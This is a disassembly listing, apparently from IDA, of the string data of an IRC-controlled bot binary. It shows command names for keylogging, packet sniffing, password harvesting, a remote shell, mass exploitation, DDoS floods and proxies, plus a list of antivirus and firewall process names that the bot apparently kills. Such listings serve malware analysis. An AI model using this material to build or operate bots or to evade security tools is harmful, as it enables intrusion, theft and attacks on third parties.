dword_4371F0 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_411A19�o
dd 2BBBB02h
aNoMessageSpeci db ' No message specified.',0
dword_437220 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_4119D1�o
dd 2BBBB02h
aUserListFailed db ' User list failed.',0
dword_43724C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+22D9�o
dd 2BBBB02h
aUserListComple db ' User list completed.',0
align 4
aUser db 'user',0 ; DATA XREF: sub_40F6F1+224C�o
align 4
dword_437284 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_411932�o
dd 2BBBB02h
aShareListFaile db ' Share list failed.',0
align 4
dword_4372B4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+2237�o
dd 2BBBB02h
aShareListCompl db ' Share list completed.',0
aShare db 'share',0 ; DATA XREF: sub_40F6F1+21CF�o
align 4
aDelete db 'delete',0 ; DATA XREF: sub_40F6F1+21B4�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_40F6F1+2181�o
align 4
aStop db 'stop',0 ; DATA XREF: sub_40F6F1+2169�o
align 4
dword_437304 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_41184F�o
dd 2BBBB02h
aServiceListFai db ' Service list failed.',0
align 4
dword_437334 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+2154�o
dd 2BBBB02h
aServiceListCom db ' Service list completed.',0
align 4
dword_437368 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+20D0�o
dd 2BBBB02h
aFailedToLoadAd db ' Failed to load advapi32.dll or netapi32.dll.',0
align 10h
aSys_net db 'sys.net',0 ; DATA XREF: sub_40F6F1+20AC�o
aOffz db 'offz',0 ; DATA XREF: sub_40F6F1+207E�o
; sub_40F6F1+2095�o
align 10h
aCmd_kl_on db 'cmd.kl.on',0 ; DATA XREF: sub_40F6F1+2067�o
align 4
aKeylog db 'keylog',0 ; DATA XREF: sub_40F6F1+2050�o
align 4
a_n_z_m_Sniff_3 db '.n.z.m. (sniffer.p.l.g) .»». No sniffer thread found.',0
; DATA XREF: sub_40F6F1:loc_411734�o
align 4
a_n_z_m_Sniff_2 db '.n.z.m. (sniffer.p.l.g) .»». sniffer stopped. (%d thread(s) stop'
; DATA XREF: sub_40F6F1+2039�o
db 'ped.)',0
align 4
a_n_z_m_Sniff_1 db '.n.z.m. (sniffer.p.l.g) .»». Failed to start sniffer thread, erro'
; DATA XREF: sub_40F6F1+200B�o
db 'r: <%d>.',0
align 10h
a_n_z_m_Sniff_0 db '.n.z.m. (sniffer.p.l.g) .»». packet sniffer active.',0
; DATA XREF: sub_40F6F1+1F9C�o
a_n_z_m_Sniffer db '.n.z.m. (sniffer.p.l.g) .»». Already running.',0
; DATA XREF: sub_40F6F1+1F3B�o
align 4
aSniffer db 'sniffer',0 ; DATA XREF: sub_40F6F1+1F06�o
a_n_z_m_Psnif_3 db '.n.z.m. (psniff.p.l.g) .»». No Carnivore thread found.',0
; DATA XREF: sub_40F6F1:loc_4115BF�o
a_n_z_m_Psnif_2 db '.n.z.m. (psniff.p.l.g) .»». Carnivore stopped. (%d thread(s) sto'
; DATA XREF: sub_40F6F1+1EC4�o
db 'pped.)',0
aOff db 'off',0 ; DATA XREF: sub_40F6F1+1EA5�o
; sub_40F6F1+2016�o
a_n_z_m_Psnif_1 db '.n.z.m. (psniff.p.l.g) .»». Failed to start sniffer thread, erro'
; DATA XREF: sub_40F6F1+1E9A�o
db 'r: <%d>.',0
align 4
a_n_z_m_Psnif_0 db '.n.z.m. (psniff.p.l.g) .»». Carnivore packet sniffer active.',0
; DATA XREF: sub_40F6F1+1E2F�o
align 4
a_n_z_m_Psniff_ db '.n.z.m. (psniff.p.l.g) .»». Already running.',0
; DATA XREF: sub_40F6F1+1DCB�o
align 4
aOn db 'on',0 ; DATA XREF: sub_40F6F1+1DAB�o
; sub_40F6F1+1F1B�o
align 10h
aPsniff db 'psniff',0 ; DATA XREF: sub_40F6F1+1D96�o
align 4
aCom_rf db 'com.rf',0 ; DATA XREF: sub_40F6F1+1D7F�o
align 10h
aCom_readfile db 'com.readfile',0 ; DATA XREF: sub_40F6F1+1D68�o
align 10h
aCom_cm db 'com.cm',0 ; DATA XREF: sub_40F6F1+1D51�o
align 4
aCom_cmd db 'com.cmd',0 ; DATA XREF: sub_40F6F1+1D3A�o
aMirc_cmd db 'mirc.cmd',0 ; DATA XREF: sub_40F6F1+1D0C�o
; sub_40F6F1+1D23�o
align 4
aIrc_v db 'irc.v',0 ; DATA XREF: sub_40F6F1+1CF5�o
align 4
aIrc_visit db 'irc.visit',0 ; DATA XREF: sub_40F6F1+1CDE�o
align 10h
aCom_fl db 'com.fl',0 ; DATA XREF: sub_40F6F1+1CC7�o
align 4
aCom_filelist db 'com.filelist',0 ; DATA XREF: sub_40F6F1+1CB0�o
align 4
aDcc_gt db 'dcc.gt',0 ; DATA XREF: sub_40F6F1+1C99�o
align 10h
aDcc_get db 'dcc.get',0 ; DATA XREF: sub_40F6F1+1C82�o
aCom_del db 'com.del',0 ; DATA XREF: sub_40F6F1+1C6B�o
aCom_delete db 'com.delete',0 ; DATA XREF: sub_40F6F1+1C54�o
align 4
aCom_pkid db 'com.pkid',0 ; DATA XREF: sub_40F6F1+1C3D�o
align 4
aCom_prockillid db 'com.prockillid',0 ; DATA XREF: sub_40F6F1+1C26�o
align 4
aCom_kpn db 'com.kpn',0 ; DATA XREF: sub_40F6F1+1C0F�o
aCom_killprocna db 'com.killprocname',0 ; DATA XREF: sub_40F6F1+1BF8�o
align 4
aIrc_dn db 'irc.dn',0 ; DATA XREF: sub_40F6F1+1BE1�o
align 4
aIrc_dns db 'irc.dns',0 ; DATA XREF: sub_40F6F1+1BCA�o
aIrc_se db 'irc.se',0 ; DATA XREF: sub_40F6F1+1BB3�o
align 4
aIrc_setserve db 'irc.setserve',0 ; DATA XREF: sub_40F6F1+1B9C�o
align 4
aCom_o db 'com.o',0 ; DATA XREF: sub_40F6F1+1B85�o
align 4
aCom_open db 'com.open',0 ; DATA XREF: sub_40F6F1+1B6E�o
align 10h
aIrc_pr db 'irc.pr',0 ; DATA XREF: sub_40F6F1+1B57�o
align 4
aIrc_prefix db 'irc.prefix',0 ; DATA XREF: sub_40F6F1+1B40�o
align 4
aClone_rn db 'clone.rn',0 ; DATA XREF: sub_40F6F1+1B29�o
align 10h
aClone_rndnick db 'clone.rndnick',0 ; DATA XREF: sub_40F6F1+1B12�o
align 10h
aClone_q db 'clone.q',0 ; DATA XREF: sub_40F6F1+1AFB�o
aClone_quit db 'clone.quit',0 ; DATA XREF: sub_40F6F1+1AE4�o
align 4
aThreads_k db 'threads.k',0 ; DATA XREF: sub_40F6F1+1ACD�o
align 10h
aThreads_kill db 'threads.kill',0 ; DATA XREF: sub_40F6F1+1AB6�o
align 10h
aIrc_ra db 'irc.ra',0 ; DATA XREF: sub_40F6F1+1A9F�o
align 4
aIrc_raw db 'irc.raw',0 ; DATA XREF: sub_40F6F1+1A88�o
aIrc_pt db 'irc.pt',0 ; DATA XREF: sub_40F6F1+1A71�o
align 4
aIrc_part db 'irc.part',0 ; DATA XREF: sub_40F6F1+1A5A�o
align 4
aIrc_j db 'irc.j',0 ; DATA XREF: sub_40F6F1+1A43�o
align 4
aIrc_join db 'irc.join',0 ; DATA XREF: sub_40F6F1+1A2C�o
align 4
aIrc_n db 'irc.n',0 ; DATA XREF: sub_40F6F1+1A15�o
align 10h
aIrc_nick db 'irc.nick',0 ; DATA XREF: sub_40F6F1+19FE�o
align 4
aRoot_mass db 'root.mass',0 ; DATA XREF: sub_40F6F1+19D8�o
align 4
aRoot_massexplo db 'root.massexploit',0 ; DATA XREF: sub_40F6F1+19C1�o
align 4
aCom_fp db 'com.fp',0 ; DATA XREF: sub_40F6F1+19AA�o
align 4
aCom_findpass db 'com.findpass',0 ; DATA XREF: sub_40F6F1+1993�o
align 4
aDaemon_tf_on db 'daemon.tf.on',0 ; DATA XREF: sub_40F6F1+197C�o
align 4
aDaemon_tftp_on db 'daemon.tftp.on',0 ; DATA XREF: sub_40F6F1+1965�o
align 4
aDaemon_web_on db 'daemon.web.on',0 ; DATA XREF: sub_40F6F1+194E�o
align 4
aDaemon_httpd_o db 'daemon.httpd.on',0 ; DATA XREF: sub_40F6F1+1937�o
aRoot_cip db 'root.cip',0 ; DATA XREF: sub_40F6F1+1920�o
align 10h
aRoot_currentip db 'root.currentip',0 ; DATA XREF: sub_40F6F1+1909�o
align 10h
aUtil_fdns db 'util.fdns',0 ; DATA XREF: sub_40F6F1+18F2�o
align 4
aUtil_flushdns db 'util.flushdns',0 ; DATA XREF: sub_40F6F1+18DB�o
align 4
aUtil_farp db 'util.farp',0 ; DATA XREF: sub_40F6F1+18C4�o
align 4
aUtil_flusharp db 'util.flusharp',0 ; DATA XREF: sub_40F6F1+18AD�o
align 4
aCom_gc db 'com.gc',0 ; DATA XREF: sub_40F6F1+1896�o
align 10h
aCom_getclip db 'com.getclip',0 ; DATA XREF: sub_40F6F1+187F�o
dword_4378DC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+186C�o
dd 2BBBB02h
aLoginListCompl db ' Login list complete.',0
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_40F6F1+1839�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_40F6F1:loc_410F1D�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_40F6F1+1804�o
align 4
aIrc_who db 'irc.who',0 ; DATA XREF: sub_40F6F1+17E7�o
aCmd db '[CMD]',0 ; DATA XREF: sub_40F6F1+17DA�o
align 4
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_40F6F1+17D5�o
align 4
aCom_ocmd_off db 'com.ocmd.off',0 ; DATA XREF: sub_40F6F1+17BC�o
align 4
aCom_ocmd db 'com.ocmd',0 ; DATA XREF: sub_40F6F1+17A5�o
align 4
aCom_opencmd db 'com.opencmd',0 ; DATA XREF: sub_40F6F1+178E�o
aCom_dll db 'com.dll',0 ; DATA XREF: sub_40F6F1+1777�o
aCom_testdlls db 'com.testdlls',0 ; DATA XREF: sub_40F6F1+1760�o
align 4
aCom_drv db 'com.drv',0 ; DATA XREF: sub_40F6F1+1749�o
aCom_driveinfo db 'com.driveinfo',0 ; DATA XREF: sub_40F6F1+1732�o
align 4
aCom_up db 'com.up',0 ; DATA XREF: sub_40F6F1+171B�o
align 4
aCom_uptime db 'com.uptime',0 ; DATA XREF: sub_40F6F1+1704�o
align 4
aCom_key db 'com.key',0 ; DATA XREF: sub_40F6F1+16ED�o
aCom_harvest db 'com.harvest',0 ; DATA XREF: sub_40F6F1+16D6�o
aCom_ps db 'com.ps',0 ; DATA XREF: sub_40F6F1+16BF�o
align 4
aCom_procs db 'com.procs',0 ; DATA XREF: sub_40F6F1+16A8�o
align 10h
aIrc_disco33 db 'irc.disco33',0 ; DATA XREF: sub_40F6F1+1691�o
aIrc_discordanc db 'irc.discordanc33',0 ; DATA XREF: sub_40F6F1+167A�o
align 10h
aCom_si db 'com.si',0 ; DATA XREF: sub_40F6F1+1663�o
align 4
aCom_sysinfo db 'com.sysinfo',0 ; DATA XREF: sub_40F6F1+164C�o
unk_437A14 db 2 ; DATA XREF: sub_40F6F1+1636�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 75h, 70h
db 65h ; e
db 72h, 73h, 79h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_26 db ' Failed to start flood thread, error: <%d>.',0
align 10h
unk_437A60 db 2 ; DATA XREF: sub_40F6F1+15BE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 75h, 70h
db 65h ; e
db 72h, 73h, 79h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSSFo_1 db ' Flooding: (%s:%s) for %s seconds.',0
aDdos_supersyn db 'ddos.supersyn',0 ; DATA XREF: sub_40F6F1+1529�o
align 10h
aCom_ni db 'com.ni',0 ; DATA XREF: sub_40F6F1+1512�o
align 4
aCom_netinfo db 'com.netinfo',0 ; DATA XREF: sub_40F6F1+14FB�o
aUtil_clg db 'util.clg',0 ; DATA XREF: sub_40F6F1+14E4�o
align 10h
aUtil_clearlog db 'util.clearlog',0 ; DATA XREF: sub_40F6F1+14CD�o
align 10h
aIrc_lg db 'irc.lg',0 ; DATA XREF: sub_40F6F1+14B6�o
align 4
aIrc_log db 'irc.log',0 ; DATA XREF: sub_40F6F1+149F�o
aIrc_al db 'irc.al',0 ; DATA XREF: sub_40F6F1+1488�o
align 4
aIrc_aliases db 'irc.aliases',0 ; DATA XREF: sub_40F6F1+1471�o
aThreads_l db 'threads.l',0 ; DATA XREF: sub_40F6F1+145A�o
align 10h
aThreads_list db 'threads.list',0 ; DATA XREF: sub_40F6F1+1443�o
align 10h
dword_437B20 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+140F�o
dd 2BBBB02h
aFailedToReboot db ' Failed to reboot system.',0
align 4
dword_437B54 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+1408�o
dd 2BBBB02h
aRebootingSyste db ' Rebooting system.',0
aCom_rebewt db 'com.rebewt',0 ; DATA XREF: sub_40F6F1+13F1�o
align 4
aIrc_i db 'irc.i',0 ; DATA XREF: sub_40F6F1+13DA�o
align 4
aIrc_id db 'irc.id',0 ; DATA XREF: sub_40F6F1+13C3�o
align 4
aIrc_s db 'irc.s',0 ; DATA XREF: sub_40F6F1+13AC�o
align 4
aIrc_status db 'irc.status',0 ; DATA XREF: sub_40F6F1+1395�o
align 10h
aIrc_q db 'irc.q',0 ; DATA XREF: sub_40F6F1+137E�o
align 4
aIrc_quit db 'irc.quit',0 ; DATA XREF: sub_40F6F1+1367�o
align 4
aIrc_d db 'irc.d',0 ; DATA XREF: sub_40F6F1+1350�o
align 4
aIrc_disconnect db 'irc.disconnect',0 ; DATA XREF: sub_40F6F1+1339�o
align 4
aIrc_r db 'irc.r',0 ; DATA XREF: sub_40F6F1+1322�o
align 4
aIrc_reconnect db 'irc.reconnect',0 ; DATA XREF: sub_40F6F1+130B�o
align 4
aRoot_st db 'root.st',0 ; DATA XREF: sub_40F6F1+12F4�o
aRoot_stats db 'root.stats',0 ; DATA XREF: sub_40F6F1+12DD�o
align 4
aExploitation db 'Exploitation',0 ; DATA XREF: sub_40F6F1+12D0�o
align 4
aScan db 'Scan',0 ; DATA XREF: sub_40F6F1+12CB�o
align 10h
aRoot_stop db 'root.stop',0 ; DATA XREF: sub_40F6F1+12B2�o
align 4
dword_437C2C dd 65027302h, 1F727563h, 2E2E1F65h, 0aSecure_0 db 'Secure',0 ; DATA XREF: sub_40F6F1+12A0�o
align 4
aLockdown_stop db 'lockdown.stop',0 ; DATA XREF: sub_40F6F1+1287�o
align 4
dword_437C54 dd 6C026302h, 1F656E6Fh, 2E2E1F73h, 0aClone db 'Clone',0 ; DATA XREF: sub_40F6F1+1275�o
align 4
aClone_off db 'clone.off',0 ; DATA XREF: sub_40F6F1+125C�o
align 4
aCom_ps_off db 'com.ps.off',0 ; DATA XREF: sub_40F6F1+1245�o
align 4
aCom_procs_off db 'com.procs.off',0 ; DATA XREF: sub_40F6F1+122E�o
align 4
aUtil_ff_off db 'util.ff.off',0 ; DATA XREF: sub_40F6F1+1217�o
aUtil_findfile_ db 'util.findfile.off',0 ; DATA XREF: sub_40F6F1+1200�o
align 4
dword_437CB4 dd 66027402h, 641F7074h, 2E2E1FhaDaemon_tftp_of db 'daemon.tftp.off',0 ; DATA XREF: sub_40F6F1+11D5�o
dword_437CD0 dd 69027002h, 1F671F6Eh, 2E2Ehdword_437CDC dd 676E6950h, 6F6C6620h, 646Fhdword_437CE8 dd 736F6464h, 6E69702Eh, 666F2E67h, 66hdword_437CF8 dd 64027502h, 2E1F701Fh, 2Ehdword_437D04 dd 20504455h, 6F6F6C66h, 64hdword_437D10 dd 736F6464h, 7064752Eh, 66666F2Eh, 0dword_437D20 dd 79027302h, 2E1F6E1Fh, 2Ehdword_437D2C dd 206E7953h, 6F6F6C66h, 64hdword_437D38 dd 736F6464h, 6E79732Eh, 66666F2Eh, 0dword_437D48 dd 64026402h, 1F731F6Fh, 2E2Ehdword_437D54 dd 536F4444h, 6F6C6620h, 646Fhdword_437D60 dd 736F6464h, 66666F2Eh, 0dword_437D6C dd 65027202h, 65726964h, 1F741F63h, 2E2Ehdword_437D7C dd 20504354h, 69646572h, 74636572h, 0aProxy_redirect db 'proxy.redirect.off',0 ; DATA XREF: sub_40F6F1+10FE�o
align 10h
dword_437DA0 dd 6F026C02h, 2E1F671Fh, 2Ehdword_437DAC dd 20676F4Ch, 7473696Ch, 0dword_437DB8 dd 2E676F6Ch, 66666Fhdword_437DC0 dd 74026802h, 641F7074h, 2E2E1Fhdword_437DCC dd 6D656164h, 772E6E6Fh, 6F2E6265h, 6666hdword_437DDC dd 6F027302h, 1F736B63h, 2E2E1F34h, 0aServer db 'Server',0 ; DATA XREF: sub_40F6F1+1087�o
; sub_40F6F1+10C7�o ...
align 4
aProxy_socks4_0 db 'proxy.socks4.off',0 ; DATA XREF: sub_40F6F1+106E�o
align 4
aProxy_s4_on db 'proxy.s4.on',0 ; DATA XREF: sub_40F6F1+1057�o
aProxy_socks4_o db 'proxy.socks4.on',0 ; DATA XREF: sub_40F6F1+1040�o
aLd_off db 'ld.off',0 ; DATA XREF: sub_40F6F1+1029�o
align 4
aLockdown_off db 'lockdown.off',0 ; DATA XREF: sub_40F6F1+1012�o
align 4
aLd_on db 'ld.on',0 ; DATA XREF: sub_40F6F1+FFB�o
align 4
aLockdown_on db 'lockdown.on',0 ; DATA XREF: sub_40F6F1+FE4�o
aVer db 'ver',0 ; DATA XREF: sub_40F6F1+FCD�o
aIrc_version db 'irc.version',0 ; DATA XREF: sub_40F6F1+FB6�o
aLo db 'lo',0 ; DATA XREF: sub_40F6F1+F9F�o
align 4
aIrc_logout db 'irc.logout',0 ; DATA XREF: sub_40F6F1+F88�o
align 10h
aIrc_di db 'irc.di',0 ; DATA XREF: sub_40F6F1+F71�o
align 4
aIrc_die db 'irc.die',0 ; DATA XREF: sub_40F6F1+F5A�o
aRn db 'rn',0 ; DATA XREF: sub_40F6F1+F43�o
align 4
aIrc_rndnick db 'irc.rndnick',0 ; DATA XREF: sub_40F6F1+F29�o
a63 db '63',0 ; DATA XREF: sub_40F6F1+DF4�o
align 4
asc_437E94: ; DATA XREF: sub_40F6F1+DCC�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_40F6F1+D8C�o
; sub_40F6F1+DA4�o ...
align 10h
aServer_1 db '$server',0 ; DATA XREF: sub_40F6F1+D7F�o
aRndnick db '$rndnick',0 ; DATA XREF: sub_40F6F1+D6C�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_40F6F1+D4D�o
align 4
aUser_3 db '$user',0 ; DATA XREF: sub_40F6F1+D3A�o
align 4
aMe_0 db '$me',0 ; DATA XREF: sub_40F6F1+D26�o
aD db '$%d',0 ; DATA XREF: sub_40F6F1+CB8�o
aD_0 db '$%d-',0 ; DATA XREF: sub_40F6F1+BFD�o
align 4
aIrc_act db 'irc.act',0 ; DATA XREF: sub_40F6F1+B25�o
aIrc_activate db 'irc.activate',0 ; DATA XREF: sub_40F6F1+B0D�o
align 4
dword_437EEC dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+AEA�o
dd 2BBBB02h
aChatFailedByUn db ' Chat failed by unauthorized user: %s.',0
dword_437F2C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+AD9�o
dd 2BBBB02h
aChatAlreadyAct db ' Chat already active with user: %s.',0
align 4
dword_437F6C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+AC8�o
dd 2BBBB02h
aFailedToSta_27 db ' Failed to start chat thread, error: <%d>.',0
dword_437FB0 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+A59�o
dd 2BBBB02h
aChatFromUserS_ db ' Chat from user: %s.',0
align 10h
aChat db 'CHAT',0 ; DATA XREF: sub_40F6F1+9C2�o
align 4
dword_437FE8 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+9A5�o
dd 2BBBB02h
aReceiveFileSFa db ' Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
dword_438038 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+97B�o
; sub_40F6F1+4D3B�o
dd 2BBBB02h
aFailedToSta_28 db ' Failed to start transfer thread, error: <%d>.',0
dword_438080 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_40F6F1+96A�o
dd 0A0Dh
dword_438098 dd 4E495001h, 47haSHasJustVersio db '%s has just versioned me.',0 ; DATA XREF: sub_40F6F1+8F0�o
align 4
dword_4380BC dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_40F6F1+8D6�o
dd 0D017325h, 0Ah
dword_4380D8 dd 52455601h, 4E4F4953h, 1dword_4380E4 dd 23h dword_4380E8 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+78B�o
dd 2BBBB02h
aReceiveFileSFr db ' Receive file: ',27h,'%s',27h,' from user: %s.',0
aSend_0 db 'SEND',0 ; DATA XREF: sub_40F6F1+6E8�o
align 4
dword_43812C dd 43434401h, 0 dword_438134 dd 323333h ; sub_40F6F1+B47�o ...
dword_438138 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5D2�o
dd 2BBBB02h
aUserSLoggedOut db ' User: %s logged out.',0
align 4
dword_438168 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5AB�o
dd 2BBBB02h
aJoinedChanne_0 db ' Joined channel: %s.',0
align 4
a353 db '353',0 ; DATA XREF: sub_40F6F1+574�o
aPart db 'PART',0 ; DATA XREF: sub_40F6F1+526�o
; sub_40F6F1+5EF�o
align 4
aSS_0 db ':%s%s',0 ; DATA XREF: sub_40F6F1+4FE�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_40F6F1+3D0�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1+371�o
; sub_40F6F1+613�o
dword_4381C4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+358�o
; sub_40F6F1+615E�o ...
dd 2BBBB02h
aUserSLoggedO_0 db ' User %s logged out.',0
align 4
aKick db 'KICK',0 ; DATA XREF: sub_40F6F1+2E7�o
align 4
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1+290�o
; sub_40F6F1+5135�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_40F6F1+265�o
a@: ; DATA XREF: sub_40F6F1+23A�o
unicode 0, <@>,0
a302_0 db '302',0 ; DATA XREF: sub_40F6F1+22A�o
a005 db '005',0 ; DATA XREF: sub_40F6F1+215�o
a001 db '001',0 ; DATA XREF: sub_40F6F1+200�o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1+1E4�o
; sub_40F6F1+3B7�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1+1C3�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_40F6F1+1A9�o
align 10h
asc_438240: ; DATA XREF: sub_40F6F1+19A�o
; sub_40F6F1+628B�o
unicode 0, <!>,0
asc_438244 db ' :',0 ; DATA XREF: sub_40F6F1+86�o
; sub_40F6F1:loc_410290�o
align 4
dd 7530h
off_43824C dd offset aAckwin32_exe ; DATA XREF: sub_415B93+CB�o
; "ACKWIN32.EXE"
dd offset aAdaware_exe ; "ADAWARE.EXE"
dd offset aAdvxdwin_exe ; "ADVXDWIN.EXE"
dd offset aAgentsvr_exe ; "AGENTSVR.EXE"
dd offset aAgentw_exe ; "AGENTW.EXE"
dd offset aAlertsvc_exe ; "ALERTSVC.EXE"
dd offset aAlevir_exe ; "ALEVIR.EXE"
dd offset aAlogserv_exe ; "ALOGSERV.EXE"
dd offset aAmon9x_exe ; "AMON9X.EXE"
dd offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE"
dd offset aAntivirus_exe ; "ANTIVIRUS.EXE"
dd offset aAnts_exe ; "ANTS.EXE"
dd offset aApimonitor_exe ; "APIMONITOR.EXE"
dd offset aAplica32_exe ; "APLICA32.EXE"
dd offset aApvxdwin_exe ; "APVXDWIN.EXE"
dd offset aArr_exe ; "ARR.EXE"
dd offset aAtcon_exe ; "ATCON.EXE"
dd offset aAtguard_exe ; "ATGUARD.EXE"
dd offset aAtro55en_exe ; "ATRO55EN.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtwatch_exe ; "ATWATCH.EXE"
dd offset aAu_exe ; "AU.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAvconsol_exe ; "AVCONSOL.EXE"
dd offset aAve32_exe ; "AVE32.EXE"
dd offset aAvgcc32_exe ; "AVGCC32.EXE"
dd offset aAvgctrl_exe ; "AVGCTRL.EXE"
dd offset aAvgnt_exe ; "AVGNT.EXE"
dd offset aAvgserv_exe ; "AVGSERV.EXE"
dd offset aAvgserv9_exe ; "AVGSERV9.EXE"
dd offset aAvguard_exe ; "AVGUARD.EXE"
dd offset aAvgw_exe ; "AVGW.EXE"
dd offset aAvkpop_exe ; "AVKPOP.EXE"
dd offset aAvkserv_exe ; "AVKSERV.EXE"
dd offset aAvkservice_exe ; "AVKSERVICE.EXE"
dd offset aAvkwctl9_exe ; "AVKWCTl9.EXE"
dd offset aAvltmain_exe ; "AVLTMAIN.EXE"
dd offset aAvnt_exe ; "AVNT.EXE"
dd offset aAvp_exe ; "AVP.EXE"
dd offset aAvp32_exe ; "AVP32.EXE"
dd offset aAvpcc_exe ; "AVPCC.EXE"
dd offset aAvpdos32_exe ; "AVPDOS32.EXE"
dd offset aAvpm_exe ; "AVPM.EXE"
dd offset aAvptc32_exe ; "AVPTC32.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvsched32_exe ; "AVSCHED32.EXE"
dd offset aAvsynmgr_exe ; "AVSYNMGR.EXE"
dd offset aAvwin95_exe ; "AVWIN95.EXE"
dd offset aAvwinnt_exe ; "AVWINNT.EXE"
dd offset aAvwupd_exe ; "AVWUPD.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupsrv_exe ; "AVWUPSRV.EXE"
dd offset aAvxmonitor9x_e ; "AVXMONITOR9X.EXE"
dd offset aAvxmonitornt_e ; "AVXMONITORNT.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aBackweb_exe ; "BACKWEB.EXE"
dd offset aBargains_exe ; "BARGAINS.EXE"
dd offset aBd_professiona ; "BD_PROFESSIONAL.EXE"
dd offset aBeagle_exe ; "BEAGLE.EXE"
dd offset aBelt_exe ; "BELT.EXE"
dd offset aBidef_exe ; "BIDEF.EXE"
dd offset aBidserver_exe ; "BIDSERVER.EXE"
dd offset aBipcp_exe ; "BIPCP.EXE"
dd offset aBipcpevalsetup ; "BIPCPEVALSETUP.EXE"
dd offset aBisp_exe ; "BISP.EXE"
dd offset aBlackd_exe ; "BLACKD.EXE"
dd offset aBlackice_exe ; "BLACKICE.EXE"
dd offset aBlss_exe ; "BLSS.EXE"
dd offset aBootconf_exe ; "BOOTCONF.EXE"
dd offset aBootwarn_exe ; "BOOTWARN.EXE"
dd offset aBorg2_exe ; "BORG2.EXE"
dd offset aBpc_exe ; "BPC.EXE"
